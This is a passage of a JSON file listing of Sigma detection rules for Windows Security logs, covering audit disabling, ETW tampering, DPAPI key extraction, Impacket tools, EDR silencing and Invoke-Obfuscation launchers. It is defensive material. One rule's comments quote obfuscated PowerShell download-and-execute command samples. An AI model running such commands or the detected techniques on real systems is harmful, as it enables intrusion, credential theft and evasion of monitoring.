    "content": "title: Windows Event Auditing Disabled\nid: 69aeb277-f15f-4d2d-b32a-55e883609563\nrelated:\n    - id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1\n      type: derived\nstatus: test\ndescription: |\n    Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.\n    This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed.\n    Also, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\n    Please note that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one-off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyway.\nreferences:\n    - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit\nauthor: '@neu5ron, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2017-11-19\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    product: windows\n    service: security\n    definition: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\ndetection:\n    selection:\n        EventID: 4719\n        AuditPolicyChanges|contains:\n            - '%%8448' # This is \"Success removed\"\n            - '%%8450' # This is \"Failure removed\"\n    filter_main_guid:\n        # Note: We filter these GUIDs to avoid alert duplication as these are covered by ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1\n        SubcategoryGuid:\n            - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change\n            - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension\n            - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity\n            - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon\n            - '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout\n            - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon\n            - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation\n            - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change\n            - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change\n            - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management\n            - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management\n            - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management\n            - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation\n            - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations\n            - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low # Increase this after a testing period in your environment\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml",
    "content": "title: Important Windows Event Auditing Disabled\nid: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1\nrelated:\n    - id: 69aeb277-f15f-4d2d-b32a-55e883609563\n      type: derived\nstatus: test\ndescription: Detects scenarios where system auditing for important events such as \"Process Creation\" or \"Logon\" events is disabled.\nreferences:\n    - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit\n    - https://github.com/SigmaHQ/sigma/blob/ad1bfd3d28aa0ccc9656240f845022518ef65a2e/documentation/logsource-guides/windows/service/security.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-20\nmodified: 2023-11-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    product: windows\n    service: security\n    definition: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\ndetection:\n    selection_state_success_and_failure:\n        EventID: 4719\n        SubcategoryGuid:\n            # Note: Add or remove GUIDs as you see fit in your env\n            - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change\n            - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension\n            - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity\n            - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon\n            - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon\n            - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation\n            - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change\n            - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change\n            - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management\n            - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management\n            - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management\n            - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation\n            - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations\n            - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service\n        AuditPolicyChanges|contains:\n            - '%%8448' # This is \"Success removed\"\n            - '%%8450' # This is \"Failure removed\"\n    selection_state_success_only:\n        EventID: 4719\n        SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout\n        AuditPolicyChanges|contains: '%%8448'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml",
    "content": "title: ETW Logging Disabled In .NET Processes - Registry\nid: a4c90ea1-2634-4ca0-adbb-35eae169b6fc\nrelated:\n    - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544\n      type: similar\nstatus: test\ndescription: Detects potential adversaries stopping the ETW providers that record loaded .NET assemblies.\nreferences:\n    - https://twitter.com/_xpn_/status/1268712093928378368\n    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\n    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\n    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\n    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\n    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\n    - https://bunnyinside.com/?term=f71e8cb9c76a\n    - http://managed670.rssing.com/chan-5590147/all_p1.html\n    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-05\nmodified: 2022-12-20\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_etw_enabled:\n        EventID: 4657\n        ObjectName|endswith: '\\SOFTWARE\\Microsoft\\.NETFramework'\n        ObjectValueName: 'ETWEnabled'\n        NewValue: 0\n    selection_complus:\n        EventID: 4657\n        ObjectName|contains: '\\Environment'\n        ObjectValueName:\n            - 'COMPlus_ETWEnabled'\n            - 'COMPlus_ETWFlags'\n        NewValue: 0\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml",
    "content": "title: DPAPI Domain Backup Key Extraction\nid: 4ac1f50b-3bd0-4968-902d-868b4647937e\nstatus: test\ndescription: Detects tools extracting the LSA secret DPAPI domain backup key from Domain Controllers\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-06-20\nmodified: 2022-02-24\ntags:\n    - attack.credential-access\n    - attack.t1003.004\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        ObjectType: 'SecretObject'\n        AccessMask: '0x2'\n        ObjectName|contains: 'BCKUPKEY'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml",
    "content": "title: DPAPI Domain Master Key Backup Attempt\nid: 39a94fd1-8c9a-4ff6-bf22-c058762f8014\nstatus: test\ndescription: Detects anyone attempting a backup of the DPAPI Master Key. This event gets generated at the source host, not on the Domain Controller.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2023-03-15\ntags:\n    - attack.credential-access\n    - attack.t1003.004\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4692\n    condition: selection\nfalsepositives:\n    - If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data, which will trigger this event.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_external_device.yml",
    "content": "title: External Disk Drive Or USB Storage Device Was Recognized By The System\nid: f69a87ea-955e-4fb4-adb2-bb9fd6685632\nstatus: test\ndescription: Detects external disk drives or plugged-in USB devices.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416\nauthor: Keith Wright\ndate: 2019-11-20\nmodified: 2024-02-09\ntags:\n    - attack.t1091\n    - attack.t1200\n    - attack.lateral-movement\n    - attack.initial-access\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID: 6416\n    selection_field:\n        - ClassName: 'DiskDrive'\n        - DeviceDescription: 'USB Mass Storage Device'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml",
    "content": "title: Persistence and Execution at Scale via GPO Scheduled Task\nid: a8f29a7b-b137-4446-80a0-b804272f3da2\nstatus: test\ndescription: Detects lateral movement using a GPO scheduled task, a technique usually used to deploy ransomware at scale\nreferences:\n    - https://twitter.com/menasec1/status/1106899890377052160\n    - https://www.secureworks.com/blog/ransomware-as-a-distraction\n    - https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2024-09-04\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.lateral-movement\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection_5136:\n        EventID: 5136\n        AttributeLDAPDisplayName:\n            - 'gPCMachineExtensionNames'\n            - 'gPCUserExtensionNames'\n        AttributeValue|contains:\n            - 'CAB54552-DEEA-4691-817E-ED4A4D1AFC72'\n            - 'AADCED64-746C-4633-A97C-D61349046527'\n    selection_5145:\n        EventID: 5145\n        ShareName|endswith: '\\SYSVOL' # looking for the string \\\\*\\SYSVOL\n        RelativeTargetName|endswith: 'ScheduledTasks.xml'\n        AccessList|contains:\n            - 'WriteData'\n            - '%%4417'\n    condition: 1 of selection_*\nfalsepositives:\n    - If the source IP is not localhost then it is highly suspicious; it is better to monitor both local and remote changes to GPO scheduled tasks.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hidden_user_creation.yml",
    "content": "title: Hidden Local User Creation\nid: 7b449a5e-1db5-4dd0-a2dc-4e3a67282538\nstatus: test\ndescription: Detects the creation of a local hidden user account (user name ending with a dollar sign), which should not normally occur for event ID 4720.\nreferences:\n    - https://twitter.com/SBousseaden/status/1387743867663958021\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-05-03\nmodified: 2024-01-16\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4720\n        TargetUserName|endswith: '$'\n    filter_main_homegroup:\n        TargetUserName: 'HomeGroupUser$'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hktl_edr_silencer.yml",
    "content": "title: HackTool - EDRSilencer Execution - Filter Added\nid: 98054878-5eab-434c-85d4-72d4e5a3361b\nstatus: test\ndescription: |\n    Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.\nreferences:\n    - https://github.com/netero1010/EDRSilencer\nauthor: Thodoris Polyzos (@SmoothDeploy)\ndate: 2024-01-29\nmodified: 2024-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Filtering Platform Policy Change needs to be enabled'\ndetection:\n    selection:\n        EventID:\n            - 5441\n            - 5447\n        FilterName|contains: 'Custom Outbound Filter'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hktl_nofilter.yml",
    "content": "title: HackTool - NoFilter Execution\nid: 7b14c76a-c602-4ae6-9717-eff868153fc0\nstatus: test\ndescription: |\n    Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators\nreferences:\n    - https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp\n    - https://github.com/deepinstinct/NoFilter\n    - https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation\n    - https://x.com/_st0pp3r_/status/1742203752361128162?s=20\nauthor: Stamatis Chatzimangou (st0pp3r)\ndate: 2024-01-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134\n    - attack.t1134.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Filtering Platform Policy Change needs to be enabled'\ndetection:\n    selection_5447:\n        EventID: 5447\n        FilterName|contains: 'RonPolicy'\n    selection_5449:\n        EventID: 5449\n        ProviderContextName|contains: 'RonPolicy'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml",
    "content": "title: HybridConnectionManager Service Installation\nid: 0ee4d8a5-4e67-4faf-acfa-62a78457d1f2\nstatus: test\ndescription: Detects the installation of the Hybrid Connection Manager service.\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1554\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceName: HybridConnectionManager\n        ServiceFileName|contains: HybridConnectionManager\n    condition: selection\nfalsepositives:\n    - Legitimate use of Hybrid Connection Manager via Azure function apps.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_impacket_psexec.yml",
    "content": "title: Impacket PsExec Execution\nid: 32d56ea1-417f-44ff-822b-882873f5f43b\nstatus: test\ndescription: Detects execution of Impacket's psexec.py.\nreferences:\n    - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nauthor: Bhabesh Raj\ndate: 2020-12-14\nmodified: 2022-09-22\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection1:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName|contains:\n            - 'RemCom_stdin'\n            - 'RemCom_stdout'\n            - 'RemCom_stderr'\n    condition: selection1\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_impacket_secretdump.yml",
    "content": "title: Possible Impacket SecretDump Remote Activity\nid: 252902e3-5830-4cf6-bf21-c22083dfd5cf\nstatus: test\ndescription: Detects AD credential dumping using the Impacket secretdump hacktool (HKTL)\nreferences:\n    - https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nauthor: Samir Bousseaden, wagga\ndate: 2019-04-03\nmodified: 2022-08-11\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.003\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\ADMIN$' # looking for the string \\\\*\\ADMIN$\n        RelativeTargetName|contains|all:\n            - 'SYSTEM32\\'\n            - '.tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - Security\nid: 4edf51e1-cb83-4e1a-bc39-800e396068e3\nrelated:\n    - id: f7385ee2-0e0c-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'cmd'\n            - '&&'\n            - 'clipboard]::'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - Security\nid: fd0f5778-d3cb-4c9a-9695-66759d04702a\nrelated:\n    - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9\n      type: derived\nstatus: test\ndescription: Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the code block linked in the references\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019-11-08\nmodified: 2022-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection_eid:\n        EventID: 4697\n    selection_servicefilename:\n        - ServiceFileName|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ServiceFileName|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ServiceFileName|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ServiceFileName|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ServiceFileName|re: '\\\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ServiceFileName|re: '\\$VerbosePreference\\.ToString\\('\n        - ServiceFileName|re: '\\String\\]\\s*\\$VerbosePreference'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - Security\nid: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974\nrelated:\n    - id: 72862bf2-0eb1-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'cmd'\n            - 'powershell'\n    selection2:\n        ServiceFileName|contains:\n            - '${input}'\n            - 'noexit'\n    selection3:\n        ServiceFileName|contains:\n            - ' /c '\n            - ' /r '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - Security\nid: dcf2db1f-f091-425b-a821-c05875b8925a\nrelated:\n    - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75\n      type: derived\nstatus: test\ndescription: Detects obfuscated use of environment variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        # ServiceFileName|re: 'cmd.{0,5}(?:\\/c|\\/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n        # Example 1: C:\\winDoWs\\SySTeM32\\cmd.Exe /C\"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\\\"{2}{3}{0}{1}\\\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\\\"IN`VO`KecOmMaND\\\".\\\"inVo`KES`crIPt\\\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\\\"{1}{4}{2}{3}{0}\\\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \\\"{0}{1}\\\"-f'n','oti' ),( \\\"{0}{1}\\\" -f'pRoC','esS') )) )\"\n        # Example 2: cMD.exe /C \"seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\\\"{1}{0}{2}{3}\\\" -f 'eT-vaR','G','iab','lE' ) (\\\"{0}{1}\\\" -f '*m','DR*' ) ).\\\"na`ME\\\"[3,11,2]-JOIN'' ) ( ( ^&(\\\"{0}{1}\\\" -f'g','CI' ) (\\\"{0}{1}\\\" -f 'ENV',':SlDb' ) ).\\\"VA`luE\\\" ) \"\n        ServiceFileName|contains|all:\n            - 'cmd'\n            - '\"set'\n            - '-f'\n        ServiceFileName|contains:\n            - '/c'\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - Security\nid: 7a922f1b-2635-4d6c-91ef-af228b198ad3\nrelated:\n    - id: 175997c5-803c-4b08-8bb0-70b099f47595\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n            - 'readtoend'\n        ServiceFileName|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - Security\nid: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca\nrelated:\n    - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - Security\nid: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1\nrelated:\n    - id: 487c7524-f892-4054-b263-8a0ace63fc25\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via stdin in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'set'\n            - '&&'\n        ServiceFileName|contains:\n            - 'environment'\n            - 'invoke'\n            - '${input)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - Security\nid: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6\nrelated:\n    - id: 63e3365d-4824-42d8-8b82-e56810fefa0c\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via use of Clip.exe in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains: '(Clipboard|i'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - Security\nid: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a\nrelated:\n    - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via use of MSHTA in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains|all:\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - 'window.close'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml",
